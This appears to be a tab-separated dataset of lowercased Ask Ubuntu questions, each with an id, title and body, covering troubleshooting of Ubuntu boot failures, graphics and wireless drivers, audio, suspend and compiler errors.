401670	ubuntu with kernel 3.5.0-030500 not working in normal boot	i have installed kernel 3.5.0-030500 and when i try to boot in normal mode , after a loading initramdisk message , it shows bad display and it hangs the system and i need to reboot it every time . but when i try to boot it with recovery mode , it works fine ... what must be the issue ?
401672	trine 2 on ubuntu 13.10 saucy 64-bit	having bought trine 2 on the humble indie bundle , i can play the game on ubuntu 13.04 after having installed the ia32-libs package . this package has been deprecated in ubuntu 13.10 and the game no longer works from this version of ubuntu . i have a done a fresh install and am unable to get the game working . can someone help ?
401673	c compiler can not create excecutables	when i am trying to install a openvpn from a tarball , following error occurs checking whether the c compiler works ... no configure : error : in `/home/shubhamd/downloads/openvpn-2.3.2 ' : configure : error : c compiler can not create executables see `config.log ' for more details and the config.log is as follows : this file contains any messages produced by compilers while running configure , to aid debugging if configure makes a mistake . it was created by openvpn configure 2.3.2 , which was generated by gnu autoconf 2.69 . invocation command line was $ ./configure # # -- -- -- -- - # # # # platform . # # # # -- -- -- -- - # # hostname = shubhamd uname -m = x86_64 uname -r = 3.11.0-12-generic uname -s = linux uname -v = # 19-ubuntu smp wed oct 9 16:20:46 utc 2013 /usr/bin/uname -p = unknown /bin/uname -x = unknown /bin/arch = unknown /usr/bin/arch -k = unknown /usr/convex/getsysinfo = unknown /usr/bin/hostinfo = unknown /bin/machine = unknown /usr/bin/oslevel = unknown /bin/universe = unknown path : /usr/local/sbin path : /usr/local/bin path : /usr/sbin path : /usr/bin path : /sbin path : /bin path : /usr/games path : /usr/local/games # # -- -- -- -- -- - # # # # core tests . # # # # -- -- -- -- -- - # # configure:2873 : checking for a bsd-compatible install configure:2941 : result : /usr/bin/install -c configure:2952 : checking whether build environment is sane configure:3002 : result : yes configure:3143 : checking for a thread-safe mkdir -p configure:3182 : result : /bin/mkdir -p configure:3195 : checking for gawk configure:3211 : found /usr/bin/gawk configure:3222 : result : gawk configure:3233 : checking whether make sets $ ( make ) configure:3255 : result : yes configure:3339 : checking build system type configure:3353 : result : x86_64-unknown-linux-gnu configure:3373 : checking host system type configure:3386 : result : x86_64-unknown-linux-gnu configure:3418 : checking for style of include used by make configure:3446 : result : gnu configure:3517 : checking for gcc configure:3533 : found /usr/bin/gcc configure:3544 : result : gcc configure:3773 : checking for c compiler version configure:3782 : gcc -- version > & 5 gcc ( ubuntu/linaro 4.8.1-10ubuntu8 ) 4.8.1 copyright ( c ) 2013 free software foundation , inc . this is free software ; see the source for copying conditions . there is no warranty ; not even for merchantability or fitness for a particular purpose . configure:3793 : $ ? = 0 configure:3782 : gcc -v > & 5 using built-in specs . collect_gcc=gcc collect_lto_wrapper=/usr/lib/gcc/x86_64-linux-gnu/4.8/lto-wrapper target : x86_64-linux-gnu configured with : ../src/configure -v -- with-pkgversion='ubuntu/linaro 4.8.1-10ubuntu8 ' -- with-bugurl=file : ///usr/share/doc/gcc-4.8/readme.bugs -- enable-languages=c , c++ , java , go , d , fortran , objc , obj-c++ -- prefix=/usr -- program-suffix=-4.8 -- enable-shared -- enable-linker-build-id -- libexecdir=/usr/lib -- without-included-gettext -- enable-threads=posix -- with-gxx-include-dir=/usr/include/c++/4.8 -- libdir=/usr/lib -- enable-nls -- with-sysroot=/ -- enable-clocale=gnu -- enable-libstdcxx-debug -- enable-libstdcxx-time=yes -- enable-gnu-unique-object -- enable-plugin -- with-system-zlib -- disable-browser-plugin -- enable-java-awt=gtk -- enable-gtk-cairo -- with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64/jre -- enable-java-home -- with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64 -- with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-amd64 -- with-arch-directory=amd64 -- with-ecj-jar=/usr/share/java/eclipse-ecj.jar -- enable-objc-gc -- enable-multiarch -- disable-werror -- with-arch-32=i686 -- with-abi=m64 -- with-multilib-list=m32 , m64 , mx32 -- with-tune=generic -- enable-checking=release -- build=x86_64-linux-gnu -- host=x86_64-linux-gnu -- target=x86_64-linux-gnu thread model : posix gcc version 4.8.1 ( ubuntu/linaro 4.8.1-10ubuntu8 ) configure:3793 : $ ? = 0 configure:3782 : gcc -v > & 5 gcc : error : unrecognized command line option '-v' gcc : fatal error : no input files compilation terminated . configure:3793 : $ ? = 4 configure:3782 : gcc -qversion > & 5 gcc : error : unrecognized command line option '-qversion' gcc : fatal error : no input files compilation terminated . configure:3793 : $ ? = 4 configure:3813 : checking whether the c compiler works configure:3835 : gcc conftest.c > & 5 /usr/bin/ld : can not find crt1.o : no such file or directory /usr/bin/ld : can not find crti.o : no such file or directory /usr/bin/ld : can not find -lc /usr/bin/ld : can not find crtn.o : no such file or directory collect2 : error : ld returned 1 exit status configure:3839 : $ ? = 1 configure:3877 : result : no configure : failed program was : | /* confdefs.h */ | # define package_name `` openvpn '' | # define package_tarname `` openvpn '' | # define package_version `` 2.3.2 '' | # define package_string `` openvpn 2.3.2 '' | # define package_bugreport `` openvpn-users @ lists.sourceforge.net '' | # define package_url `` '' | # define openvpn_version_resource 2,3,2,0 | # define package `` openvpn '' | # define version `` 2.3.2 '' | /* end confdefs.h . */ | | int | main ( ) | { | | ; | return 0 ; | } configure:3882 : error : in `/home/shubhamd/downloads/openvpn-2.3.2 ' : configure:3884 : error : c compiler can not create executables see `config.log ' for more details how to fix the error ?
401675	suspend/wake up not working - black screen	if i suspend laptop ( closing lid , calling pm-suspend or doing it manually from menu ) , when i wake it up , everything seems to turn on except for screen . screen remain literally off , so even backlight is deactivated . only way is to force shutdown . i am on ubuntu 13.10 with latest kernel ( 3.11.0-15-generic ) . my machine is an hp pavilion dv6-2000sl laptop . vga is amd/ati rv710/m92 [ mobility radeon hd 4530/4570/545v ] . driver i 'm using is open-source ( radeon ) . i tried much things found on the web ( among which installing fglrx drivers ) , but nothing worked for me . here is pm-suspend.log and cat /var/log/syslog | grep pm i was thinking of doing downgrade to a working version of ubuntu ( or a kernel ) , but i do n't know what could it be .
401677	ca n't change touchpad to left handed	i 'm using ubuntu 13.10 and when i try to change the mouse from right to left handed via the gui , nothing happens . i tried using xinput set-button-map 11 3 2 1 to change it manually , which worked for the buttons , but it made tapping my trackpad trigger the secondary button . please help : )
401678	`` the harddrive for /dev/mapper/cryptswap1 is not yet ready or non existent . ''	two days ago i installed the ubuntu 12.04 lts on my laptop , now i have got a big problem i can not sort out , even by reading and checking what some of you stated in the explanations . problem : ( its in german so the translation may not be totally equal ) `` the harddrive for /dev/mapper/cryptswap1 is not yet ready or non existent . '' as asked : nano /etc/fstab gnu nano 2.2.6 datei : /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=ec755811-c3d0-4ffa-99d4-cb23a07a706a / ext4 errors=remoun $ # swap was on /dev/sda5 during installation # uuid=8085f746-2ae9-48ad-82aa-35fd8ace1009 none swap sw $ /dev/mapper/cryptswap1 none swap sw 0 0
401682	no audio devices after connecting bluetooth speaker	when i connect my bluetooth speaker to my pc sometimes the connection goes wrong . i hear the beeb on my speaker telling me it 's connected but when i try to play audio nothing happens . when i look in the sound settings all my output ( and input ) devices are gone , even the built in speaker of my laptop . sometimes the speaker connects no problem . but when this happens i have to reboot the computer to get any audio or media playing . i have tried killall pulseaudio and in alsamixer the volume levels are normal . i use ubuntu 12.04 on a samsung series 9 ( np900x3a ) thanks !
401683	how to use badblocks to scan a certain /dev/sdx to deal with bad sectors	i need to do partitioning to an ntfs drive that gparted said it has bad sectors . ( i made a question here ) anyways i followed its advice of using chkdsk on windows and restarted it twice but gparted still says it has bad sectors . i thought i 'd try another method and found this program ( badblocks ) . i looked up the documentation but the program seems a bit dangerous to use on my own . ( here 's the documentation ) i ca n't figure out the command i need to use . ... also if there 's a better suggestion for a program that can help me do n't hesitate . thanks in advance : )
401686	mouse problem , disappears	my new ubuntu 13.10 has a problem . the cursor frequently disappears and then reappears a few inches later . any `` pointers '' ? i am on a system76 galago , using the trackpad . i have looked all over the forums , however nothing has worked . there is no unknown monitor in my display settings . thanks , tim
401688	ubuntu will not allow wifi password more than 61 characters	my wifi password is 64 characters and the connect button is only clickable until 61 characters . any help would be appreciated . i am using wpa security .
401689	broadcome broadcom 802.11 linux sta wireless driver problem	hi i have a dell latitude e6510 computer . i have installed ubuntu 12.04 lts . now i ca n't access my wifi network . cable network is working . i am new one to ubuntu . details of network as follows . product : bcm43224 802.11a/b/g/n bcm4353 -pc : ~ $ sudo lshw -c network pci ( sysfs ) *-network description : ethernet interface product : 82577lm gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 05 serial : 00:26 : b9 : cb : d0 : a2 size : 100mbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.1.4-k duplex=full firmware=0.12-1 ip=139.78.127.227 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:40 memory : f6900000-f691ffff memory : f6980000-f6980fff ioport:7040 ( size=32 ) *-network description : network controller product : bcm43224 802.11a/b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=bcma-pci-bridge latency=0 resources : irq:17 memory : f4100000-f4103fff *-network disabled description : wireless interface physical id : 3 logical name : wlan0 serial : f0:7b : cb:7f : f7:32 capabilities : ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.8.0-29-generic firmware=n/a link=no multicast=yes wireless=ieee 802.11abgn please help me to resolve this problem
401692	ultranav of thinkppad e540 not working	i have a new thinpad e540 which has the 3 additional buttons for the mouse integrated in the touchpad here . my previous thinkpad had 3 separate buttons like those here which worked perfectly . the touchpad itself is working fine just the buttons ai n't . in windows they work , even the middle one for scrolling ! ! i 've installed the package 'configure-trackpoint ' but that did n't help ... here the input devices dmesg | grep input [ 0.559561 ] input : lid switch as /devices/lnxsystm:00/lnxsybus:00/pnp0c0d:00/input/input0 [ 0.560750 ] input : power button as /devices/lnxsystm:00/lnxpwrbn:00/input/input1 [ 1.133358 ] input : at translated set 2 keyboard as /devices/platform/i8042/serio0/input/input2 [ 11.984388 ] input : thinkpad extra buttons as /devices/platform/thinkpad_acpi/input/input3 [ 12.057888 ] psmouse serio1 : synaptics : serio : synaptics pass-through port at isa0060/serio1/input0 [ 12.103377 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input4 [ 12.965768 ] input : integrated camera as /devices/pci0000:00/0000:00:14.0/usb3/3-12/3-12:1.0/input/input5 [ 13.981071 ] input : video bus as /devices/lnxsystm:00/lnxsybus:00/pnp0a08:00/lnxvideo:00/input/input6 [ 14.049867 ] input : hda intel mid hdmi/dp , pcm=8 as /devices/pci0000:00/0000:00:03.0/sound/card0/input7 [ 14.049920 ] input : hda intel mid hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:03.0/sound/card0/input8 [ 14.049956 ] input : hda intel mid hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:03.0/sound/card0/input9 [ 14.079953 ] input : hda intel pch mic as /devices/pci0000:00/0000:00:1b.0/sound/card1/input10 [ 14.079996 ] input : hda intel pch headphone as /devices/pci0000:00/0000:00:1b.0/sound/card1/input11 [ 19.190549 ] input : tpps/2 ibm trackpoint as /devices/platform/i8042/serio1/serio2/input/input12
401693	where are my files ?	i 'm sure most of you will know what has happened instantly so thank you : ) i was going to keep both windows and wubi ( installed on ssd c : / ) and was moving files on the same hdd ( d : / ) from the windows partition to the ubuntu partition . i did n't have much space so was going to do it in parts ( i.e . move 100gb to ubuntu then reduce the windows partition , create a new ubuntu partition and move another 100gb etc. ) ... i then shrank my windows partition to later have more space in ubuntu land and move more files across but then > > > scrapped windows altogether and installed ubuntu on my c : / instead . i figured my files would still be available somewhere on my d : / though ca n't find them . all i can see are the files left on the windows side of the d : / it also looks like that d : has merged into one somewhere along the line ... please if you could help find my files that would be amazing !
401695	libv4l2 error when using webcam with usb 3.0	i 'm experiencing a problem when trying to use a webcam with my usb 3.0 ports . i have no problem using the usb 2.0 ports . i get the following error in guvcview or cheese : libv4l2 : error turning on stream : invalid argument vidioc_streamon - unable to start capture : invalid argument i get a similar error in camorama : libv4l2 : error turning on stream : invalid argument libv4l2 : error reading : invalid argument i 've tried two different webcams ( ms lifecam hd-6000 and logitech hd 615 ) , and got the same result . other devices seem work fine plugged into the usb 3.0 ports . does anyone know how what to try to get the webcams working with those ports ? -thanks in advance
401697	when i restart my pc , i am offered ubuntu but it does n't work	i have installed ubuntu 13.10 64-bit by clicking on wubi.exe . when i restart the computer , a screen displays both os options , windows 8.1 and ubuntu 13.10 . if i choose ubuntu , the only thing that happens is i get another screen telling me the following : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do n't have this disc , contact your system administrator or computer manufacturer for assistance . clicking enter sends me to same os option screen . clicking on windows 8.1 boots normally and gets me to windows 8.1 . any clues ?
401698	getting wireless driver	i 've been trying to get a ubuntu linux distro working on my computer the past day or two , and have everything working fine , except for my wireless card . i used the command lspci -nn | grep 0280 and the response i got was 04:05.0 network controller [ 0280 ] : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller [ 14e4:4318 ] ( rev 02 ) anyone know why i 'm fine with wired connections , but wireless does n't even find my network ?
401700	watching netflix in chrome on ubuntu 13.10	so i know how to get netflix desktop and watch netflix via firefox . however , i have a google chromecast and like to stream netflix to my tv . in order for me to do this , i have to be watching netflix in chrome . i have yet to find a way that actually works to get netflix streaming in chrome on ubuntu 13.10 . does anyone have any insights ?
401703	wireless not enabled in 12.04 , lenovo t440s	i have installed ubuntu 12.04 lts on my lenovo t440s , but i ca n't get the wireless to work . the adapter is a intel wireless 7260 , as shown here : http : //www.ubuntu.com/certification/hardware/201308-14073/components/ i installed while having a network cable plugged in , so all updates were also downloaded/installed during installation . when i press on the network- '' half circle '' in the top , right corner it just says `` not enabled '' at the wireless . what is wrong here , it seems like 12.04 should support it from this .
401704	setting default ubuntu desktop backgrounds	how to change the default desktop background ? a list of background pictures are available in the preference window , but i want to make my own picture as a default wallpaper . what can i do ?
401706	efax support under ubuntu	i would like to expand my home office by adding an e-fax capable machine . ( for reasons i wo n't bother you with , i have no landline and probably can not get one without spending a lot of money i do n't have . ) i am currently running ubuntu 13.04 . do i need any special programs to set up and use an e-fax account under ubuntu ? where can i find a list of printers/all-in-one machines that can do e-faxing under ubuntu ?
401707	black screen after resolution change	i have a system running ubuntu 12.04 with lxde . video card ati radeon 9200 . after changing my screen with a new one ( same vga cable ) i accidentally changed the resolution to one not supported by the screen , and i ca n't figure out how to come back to the old one . after boot i have the black screen , only terminal with ctrl-alt-f2 is visible i tried recovery mode option `` run in failsafe graphic mode '' with no result ; i tried to change resolution from terminal with the command `` xrandr '' with `` ca n't open display '' message . what can i do ?
401710	`` mode not supported '' after booting	hopefully you guys can help me out with this one . i 've recently installed graphics drivers on brand new graphics cards . after i rebooted i was greeted with `` mode not supported . '' i am inclined to believe i am stuck in `` grub boot menu , and it is using some graphical resolution on which my display chokes . it is my display that is saying that it does n't support the resolution the software has set '' . i do n't have a multiboot setup so pressing enter wo n't work . the monitor is also 10 years old . do you need me to provide any specs ? i 'm very much a novice so you will have to spoon feed me . sorry in advance , matt
401711	ubuntu studio - segmentation fault on release upgrade to 13.10	i am currently running ubuntu 13.04 on a dual boot with windows 8 on my lenovo y500 , and when i try to upgrade to 13.10 i get this : checking for a new ubuntu release authenticate 'saucy.tar.gz ' against 'saucy.tar.gz.gpg ' extracting 'saucy.tar.gz' segmentation fault ( core dumped ) does anyone know of any fixes for this issue ?
401712	compressing many folders	i have a directory containing plenty of folders as well as compressed files . i need to compress the folders that are not already so ( tar -cvzf ... ) but have no experience in sh scripts . can anyone help me writing such a script please ?
401713	how to install linux mint 's mate fork on ubuntu 12.04	the title explains itself . i want to install linux mint 's mate , but i want to keep ubuntu . is it possible to get it ? and if so , how ?
401718	unistall eclipse installed in /opt	i need java eclipse , but accidentally installed the c++ one using the steps from here installing eclipse kepler and java jdk how do i actually remove the c++ one completely ? i tried just removing the files from /opt , removing the symbolic link and installing the java over but the c++ still comes up when i call eclipse ? any help ? thanks
401723	driver nvidia problem	my graphic card is a nvidia gt540m gdd3 1gb_hybrid on an ubuntu 12.04 install . installed ubuntu one day ago.yesterday it started without any problem but since today i get `` the system is running in low-graphics mode '' . i know this was explained here ( how to fix `` the system is running in low-graphics mode '' error ? ) but i have done everything and the problem is still there . i can access the system by using shift during booting , after that `` previous linux versions '' - `` ubuntu , mit linux 3.8.0-29-generic '' . there were like more than 200 updates , so i guess it has to be related to the updates ? ( just guessing.. ) even though i can access the system , i tried installing the drivers through terminal , but apparently nothing was changed .
401727	how to run applications on an external drive such as an external hard drive , flash drive , or sd card	i recently installed ubuntu on my samsung chrome book . because the chrome book does not have alot of space , i would like to be able to install and run applications off of an external drive . i would like to use an sd card , as the small size and built in sd card reader makes that most convenient . how do i install and run applications on an external drive ?
401728	login loop in 13.10	i decided to install drivers for my ati card few hours ago , and after that , i just ca n't log in ( it was weird , because i always got loged in automatically ) . there are 2 options to choose : `` dario '' and `` guest '' . both of these accounts do n't work . i 'm sure the password for my account was always entered correctly , but it would just bring me back . i 've done some research , and other people were able to get it working by pressing ctrl+alt+f1 , loging in , and deleting xauthority or something like that . it does n't work for me . i think the problem is my username . i 'm sure it was '' dario '' , not `` dario '' . even loging in from ctrl+alt+f1 fails if i type in `` dario '' . if this really is the problem , then how to fix this ? or is there anything else that 's causing this ? oh , and i removed the driver , just to be sure .
401732	os available on gs2	ubuntu phone is available on gs2 ? wifi + 3g + sms and call ? sorry for my languages because i 'm very bad in english x ) !
401736	what does cpu # 0 stuck mean ?	i tried loading a live disk of ubuntu 12.04 on my xp computer and it keeps repeating `` cpu # 0 stuck for x seconds . '' can someone please help me ?
401737	xrdp very slow in aws ec2 instances when ubuntu-desktop is n't pre-installed	i have tried the standard canonical ubuntu lts images in ec2 for both lucid & precise ( 64-bit ) when i first ssh into the server , i run : sudo apt-get update sudo apt-get install ubuntu-desktop sudo apt-get install xrdp i then rdp into the server , and the experience is extremely slow , desktop loading one small square at a time . xfce , lfce , etc are similarly sluggish . if i use one of canonical 's test-image amis that has ubuntu-desktop preinstalled , and then install xrdp , it works much better . am i missing something in my manual install of ubuntu-desktop ? i do n't want to be restricted to unofficial test-images with undocummnted or other unknowns . i have already encountered differences in these images from the standard lts server ami . in short , i 'm looking for how to start with a standard , stock , headless lts ubuntu , and wind up with a desktop & xrdp that with its normal responsive behavior . ( i 'm not interested in freenx , the client selection is too limited . )
401741	ca n't install giplet on ubuntu 12.04	i can not install giplet . are there any alternative ways to showing my ip address on the ubuntu panel ? sekai92 @ sekai92-virtualbox : ~ $ sudo apt-get install giplet password for sekai92 : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package giplet sekai92 @ sekai92-virtualbox : ~ $
401742	shares not always visible - do n't know why	i 've got a revo rl70 ( machine1 ) and a dell laptop ( machine2 ) both running ubuntu 12.04 on the same network . i 've set up some folders on machine1 to be shareable . sometimes , when i open the file manager on machine2 , click on browse network and choose 'machine1 ' from the list i can see the shared folders , other times they do n't appear at all . all that hapopens is that the 'egg-timer ' thingy turns for a while , the title bar in file manager says 'windows shares on machine1 ' and nothing is listed in the window . i 'm quite new to ubuntu and have no networking experience so i do n't know where to start with this problem . why are n't the shared folders showing all the time ? anyone help ?
401743	no audio after hdmi connection . no hardware in speaker settings	so i 've been through numerous webpages and tried various things to no avail . my sound was working fine before i connected to hdmi tv . my screen went black and i had to restart the machine ... no sound output devices showing in sound settings though pulseaudio settings shows a hdmi output and that 's it . any ideas on how to get my sound back up on the computer ? not worried about hdmi anymore.. will fix that second : ) thanks in advance ! 12.04 lts version . list of playback hardware devices ** card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0
401747	grub rescue after installing next to win 98	i 've got an old pc at home running win 98 and after reading up on linux thought i would install ubuntu next to it to have a bit of a play and see what i though of it . i have had previous limited experience of working with aix so know a few commands ( ls , cp , vi , etc ) so was n't worried too much about any command line items even though i believe the later versions are a lot easier to use anyway . i downloaded the iso for 13.10 and wrote it to a dvd on my other pc and installed the o/s choosing to put it alongside win 98 so i could mess around with both . the only issue i had is that my network card would n't connect to the internet ( even via a wired connection ) so could n't be on the internet during the install but all seemed to go well without any issues . at the end it told me to remove the install dvd and press enter to reboot . i did this and then i was presented with : > attempting boot from hard drive ( c : ) > error : no such partition . > entering rescue mode ... > grub rescue > _ if i do an an ls it just shows : > ( hd0 ) ( hd0 , msdos1 ) ( fd0 ) and ls -l returns : > error : no such partition . even using cd says unknown command 'cd ' . i have tried a few suggestions i have found around using commands such as sudo , repair , etc but they all come up with unknown command . as i said i am happy using a command line but i do n't even know where to start here , any help would be much appreciated .
401752	downloading ubuntu for installation on an hp laptop	i need to change the os from ms windows to ubuntu on my daughter 's laptop . i am considering burning a ubuntu disk with my apple desktop ( imac ) computer . is this possible because apple does not seemlessly mersh with windows based machines ( software architecture do n't you know ) . i tried to do this once already , but the windows laptop did not recognize the cd . am i better off just trying to burn a cd for ubuntu with the laptop instead ? puzzled
401756	13.10 desktop , resume from suspend graphics problem , documented	i have a brand-new build and a brand-new installation . asus motherboard with intel z87 chipset , nvidia geforce gts 450 video card , running 13.10 `` studio '' which means xfce desktop . it goes into `` suspend '' state just fine , but when it returns , the screen is occupied by blocky black-and-white diagonal stripes . ctrl-alt-f1 shows me endless scrolling lines of the following : [ nnnn.nnnnnn ] nouvea e [ pgraph ] [ 0000:01:00.0 ] trap ch2 [ 0x003fbff000 xorg [ 1347 ] ] [ nnnn.nnnnnn ] nouvea e [ pgraph ] [ 0000:01:00.0 ] shader 0xa0040800 where nnn.nnnnnn is a string of digits which slowly increments . ctrl-alt-f7 returns me to the blocky screen . it 's still possible to perform commands , sort of : if i know where something is , i can select it with the mouse , then press ctrl-alt to show up the underscores for the hotkeys , and click on those underscores . if i had gedit open and active before suspending , i can type in it , and save with ctrl-s . while i ca n't see what i 'm doing , it looks fine later . if i log out , the screen i then get is normal , and remains normal when i log back in . also , if i have an opera browser window open , the contents of the window are just fine , but the window borders are messed up along with the rest of the screen . so , i looked up the documentation , which told me that the pm-action has options intended to deal with this kind of thing . so , i opened a terminal window , and tried each of the following , with practically the same results every time : sudo pm-suspend -- quirk-vbe-post sudo pm-suspend -- quirk-vbestate-restore sudo pm-suspend -- quirk-vbemode-restore sudo pm-suspend -- quirk-vga-mode3 sudo pm-suspend -- quirk-save-pci sudo pm-suspend -- quirk-s3-mode sudo pm-suspend -- quirk-dpms-on sudo pm-suspend -- quirk-dpms-suspend sudo pm-suspend -- quirk-s3-bios i set them out in full just in case i made a mistake with the syntax . can anyone suggest something that might help ? i suppose if i set up the sessions manager to save automatically at logout , then open automatically at login , the results would be semi-acceptable , but i really would rather have the suspend-to-ram option working .
401760	pdf- corrupt file	today i went to somebody with a pdf file , i 've made it with libreoffice writer , but , when he tried to open the file , it said that it was a corrupt file , my pdf . i 've put the file on my usb stick , and from there he opened it . what can i do to open that file on that pc ? i have to say that other files ( pdf ) can be opened on that pc . my file ca n't be corrupt because some of my friends can open it . thank you .
401763	will ubuntu 13.10 work fine on my netbook ? ? or should i choose some previos version ?	i 'm new to linux , just downloaded ubuntu 13.10 and finally decided to switch to linux . is my hp mini net book with intel ( r ) atom cpu n455 @ 1.67 ghz , 2gb ram fine to run this os smoothly or should i choose someone else ? i mean wo n't i be missing the new fun going on linux if i choose older one . ?
401766	ubuntu one in the cloud , not on the local hd	ubuntu one takes up space on the local hard drive.. this is good for in many cases , but if you have a small hard drive ( e.g . ssd ) it does not make sense only to have as much cloud as you have local hard drive.. does anyone know of any plans for ubuntu one to support a `` move to cloud '' feature in addition to the excellent file-synchronization ? i would love to make a feature request but do now know where ... also , i know this is the point of bitcasa , but i like ubuntu one better , and would love to buy a lot of space and throw out the old external hd : - )
401771	how to tell ubuntu to remember i have a uk keyboard ?	i 'm running 12.04 and have been since april 2012 ! all was well , then at some point in the last few weeks i 've noticed that ubuntu seems to think my keyboard has gone american . it has n't . it has n't changed at all , neither has anything else* . but now i type quotes @ like this @ and do n't even ask about my \hashtags if i go to keyboard layout , everything is set to uk , just as i 'd expect . although there is a blank space by `` input source '' on the `` system '' tab . but it 's clearly not treating the keyboard as uk . *the only thing i have changed is to enable auto-login for this user . surely that should not affect it ?
401772	running software-center from command line as root	i 'm not using unity , so i do n't have a handy button to click on to start software-center . it 's occasionally useful to search for software , though , so i run it from the command line . however , then i ca n't actually install the software through that interface ( no permissions ) . so i tried sudo software-center instead , hoping to fix that . after entering my password on the command line , i 'm presented with a dialog box asking for : enter password for keyring 'default ' to unlock what should i enter here to get software-center to actually start up as root ? here 's some more information . i 'm running enlightenment ( e17 ) as my desktop environment . the buttons that appear on the side bar in unity do n't appear to have an equivalent in e17 , which is why i 'm running software-center from the command line . when i do so , as me instead of root , at the point where i try to install something , an error message pops up that says : authentication error . software ca n't be installed or removed because the authentication service is not available . ( org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.96 ' } ) : org.debian.apt.install-or-remove-packages policykit does not appear to be running , or at least nothing resembling that name shows up with `` ps wux '' . so i guess that raises the question , would anyone know how to get that to start up automatically when i log in ? thanks !
401773	sshfs in fstab creates an item in devices listing that does n't work	i configured an sshfs mount as instructed in http : //ubuntuforums.org/showthread.php ? t=896474 & p=5635104 # post5635104 to work as a place to store my pictures . it is other vice working as a dream even on wifi . the only issue is that when i click `` home folder '' icon in the launcher menu it opens the directory view and in the left side menu it shows three sections `` devices '' , `` computer '' and `` network '' . under `` devices '' there is one item which seems to be the `` device '' i mounted with sshfs , at least it has the same name . clicking this item gives an error message : unable to mount pictures_remote fuse : mountpoint is not empty fuse : if you are sure this is safe , use the 'nonempty ' mount option is it trying to do the mount again ? under `` computer '' section i can see an item labelled `` pictures_remote '' ( it looks like a cd drive with an eject button ) . clicking this item opens the mounted directory and i can browse my pictures . is there a way to do the mount without getting that item in the `` devices '' section ? it seems unnecessary . edit : should perhaps say that i 'm on ubuntu 12.04
401774	ubuntu 13.10 x64 , hybrid graphics card , can not resume after suspend	i 'm using ubuntu 13.10 x64 , my hybrid graphics card is intel hd graphics 4600 and nvidia geforce 740m . i installed nvidia driver follow this article . my question is my laptop can not resume from suspend , see the pic : after i suspend laptop and try to resume , it just shows like this . how can i fix this ?
401776	dropped laptop , now get `` pxe-e61 : media test failure , check cable '' error	i dropped my laptop ( toshiba satelite ) and now i can only boot up with cd ( ubuntu 13.04 ) . otherwise i come to a black page with text . text laptop : pxe-e61 : media test failure , check cable pxe-m0f : exiting pxe rom . reboot and select proper boot device or insert boot media in selected boot device and press key questions : is my hardrive completely destroyed now ? i was going to format and reinstall but it says i do n't have enough space ! ! is it possible to format the hardrive some other way , thereby making more room and then reinstalling ubuntu ?
401779	which version of ubuntu should i use ?	i just bought a laptop ( sony vaio fit 15 ) , is a touch laptop with 8gb ram , i7 processor ( 2.00 - 3.10ghz ) . i have installed windows 8.1 , and i would like to know which exact version of ubuntu should i buy or download to get the maximum performance . i 'm not an ubuntu user and i do not know much about ubuntu , but i want to get started in this .
401780	how can i change the version ( default-series ) that juju deploys ?	i have installed maas server on one machine and have two other nodes . in the web interface of the maas server i have set distro to 13.10 and commissioning to 13.10 . when i use juju bootstrap it installs 12.04 release to the nodes . why is this happening . can you give me some advices ?
401781	i have ubuntu 12.04 lts with a dual boot of windows 7 , can i reinstall windows 7 , without changing partitions ?	i initially had windows 7 as my primary operating system . i decided to install ubuntu 12.04 lts as a dual boot . however , i realized that my windows 7 os was n't installed properly ( not because of ubuntu ) . i already created partition sizes for both os 's . is it possible to reinstall windows 7 without having to chnage around my ubuntu setup ? thanks
401785	sound from bluetooth speaker seems to freeze often and is out of sync with the video	computer model : dell inspiron n5050 ( laptop ) . version of ubuntu : have checked in ubuntu 13.10 and 13.04 model of bluetooth speaker : bose soundlink mini bluetooth speaker description of issue : issue 1 : able to pair and connect laptop to the speaker ( but the connection breaks after some time & i have to remove the speaker from the laptop bluetooth and re-pair and reconnect . issue 2 : when the speaker is connected ; if i play a movie , the sound often stops ( and pauses the video ) . also , the sound and video are out of sync ( what i see and what i hear do not match , the sound usually lagging the video ) . i have no issues connecting the bluetooth speaker to my android phone ( htc wildfire s android 2.3.5 ) and samsung galaxy tab 2 ( 10.1 inches ) and viewing movies . i have tried the below : can not connect my bluetooth speakers . why ? sudo gedit /etc/bluetooth/main.conf change the value of rememberpowered from true to false have installed blueman and bluez .
401791	how to fix : apache2 captcha generates a background graphics , but no characters ?	characters are missing on the 'captcha ' image , yet the background graphics looks fine . no errors are displayed - the image works itself . used fonts are various , put in captcha 's folder as .ttf files ( maybe the problem is file type ? ) . works on external servers , not on my localhost though . ( ubuntu 12.04 lts apache2 ) . how to fix or diagnose the problem ?
